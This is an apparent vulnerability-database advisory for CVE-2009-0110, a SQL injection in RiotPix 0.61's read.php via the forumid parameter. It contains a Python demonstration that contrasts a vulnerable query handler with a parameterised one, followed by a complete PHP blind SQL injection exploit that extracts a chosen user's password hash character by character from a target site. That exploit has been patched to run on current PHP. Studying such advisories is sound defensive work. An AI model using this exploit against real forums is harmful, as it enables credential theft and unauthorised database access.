RiotPix "read.php" SQL Injection Vulnerability

Vulnerability ID: 1117205    Vulnerability type: SQL injection
Published: 2009-01-06    Updated: 2009-01-29
CVE: CVE-2009-0110    CNNVD ID: CNNVD-200901-099
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/7679
https://cxsecurity.com/issue/WLB-2009010148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-099
|Vulnerability details
RiotPix is an open-source, standards-compliant web forum system. read.php in RiotPix 0.61 and earlier contains a SQL injection vulnerability: a remote attacker can execute arbitrary SQL statements via the forumid parameter.
|Exploit
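The defect class behind this advisory, as an added example that is not RiotPix's own code: an in-memory SQLite stand-in with a constructed schema (table and column names are assumptions), a handler that splices forumid into the query the way the advisory describes, and a hardened handler that validates and binds it. The boolean oracle the exploit below relies on (forum page versus "non-existent" error) exists only for the vulnerable handler.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the forum database; table and column
# names are assumptions, not RiotPix's real schema. The hash is constructed.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE forums (forumid INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users  (username TEXT, password TEXT);
        INSERT INTO forums VALUES (1, 'General');
        INSERT INTO users  VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db

NOT_FOUND = "non-existent forum"

def read_forum_vulnerable(db, forumid):
    # The defect class behind CVE-2009-0110: the raw query-string value is
    # spliced into the SQL text, so it can carry its own WHERE logic.
    row = db.execute("SELECT name FROM forums WHERE forumid=" + forumid).fetchone()
    return row[0] if row else NOT_FOUND

class InvalidForumId(ValueError):
    pass

def read_forum_safe(db, forumid):
    # Hardened form: accept only a short run of digits, then bind the value
    # as a parameter so it is data, never SQL syntax.
    if not re.fullmatch(r"[0-9]{1,9}", forumid):
        raise InvalidForumId(forumid)
    row = db.execute("SELECT name FROM forums WHERE forumid=?", (int(forumid),)).fetchone()
    return row[0] if row else NOT_FOUND

# Boolean conditions of the kind the advisory's exploit appends to forumid:
# the first is true for the constructed hash, the second is false.
TRUE_COND = "1 AND (SELECT substr(password,1,1) FROM users WHERE username='admin')='5'"
FALSE_COND = "1 AND (SELECT substr(password,1,1) FROM users WHERE username='admin')='0'"

def leaks_oracle(handler):
    """True if the handler's response differs between a true and a false
    appended condition, i.e. it can serve as a blind-injection oracle."""
    try:
        return handler(make_db(), TRUE_COND) != handler(make_db(), FALSE_COND)
    except InvalidForumId:
        return False
```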
<?php

/*

	$Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $

	RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit
	Bug found && Exploited by cOndemned

	Download :
		
		http://www.riotpix.com/download/riotpix0_61.zip


	Description :
		
		It's just a simple Blind SQL Injection exploit that gets the
		password hash of a given user. Code is really simple -
		without proxy or error handling, but I don't think it is
		important, as long as RiotPix isn't a famous script...
		
	-------------------------------------------------------------------	

	Greetz: 
	
		ZaBeaTy, str0ke, sid.psycho & TWT, wojtus0007, 0in, vCore


		"...What is left to die for, what is left to give..."

*/


	echo "\n[~] RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit";
	echo "\n[~] Bug found && Exploited by cOndemned\n";

	if($argc != 4)
	{
		printf("[!] Usage: php %s <target_site> <username> <topic_id>\n\n", $argv[0]);
		exit;
	}

	list($sploit, $target, $username, $topicid) = $argv;

	// Alphabet of an MD5 hex digest: ASCII codes of '0'-'9' and 'a'-'f'
	$charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
	$pos = 1;

	echo "[~] Password Hash : ";

	// One position of the 32-character hash per outer iteration
	while($pos != 33)
	{
		$found = false;
		for($i = 0; $i < count($charsArr); $i++)   // was <=, which read past the array
		{
			$query = "/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--";
			$source = file_get_contents($target . $query);

			// A false condition makes read.php render its "non-existent" forum page;
			// its absence means the guessed character is correct.
			if(stripos($source, 'existent') === false)   // eregi() no longer exists in PHP 7+
			{
				printf("%s", chr($charsArr[$i]));
				fflush(STDOUT);   // flush() takes no stream argument; fflush() is the stream flush
				$pos++;
				$found = true;
				break;
			}
		}
		if(!$found)   // without this the original looped forever when no character matched
		{
			echo "\n[!] No character matched at position $pos (wrong username or base URL?)\n";
			exit;
		}
	}

	echo "\n[~] Done\n\n";

?>

# milw0rm.com [2009-01-06]
|References

BID 33129: http://www.securityfocus.com/bid/33129
MILW0RM 7679: http://www.milw0rm.com/exploits/7679
SREASON 4893: http://securityreason.com/securityalert/4893
SECUNIA 33395: http://secunia.com/advisories/33395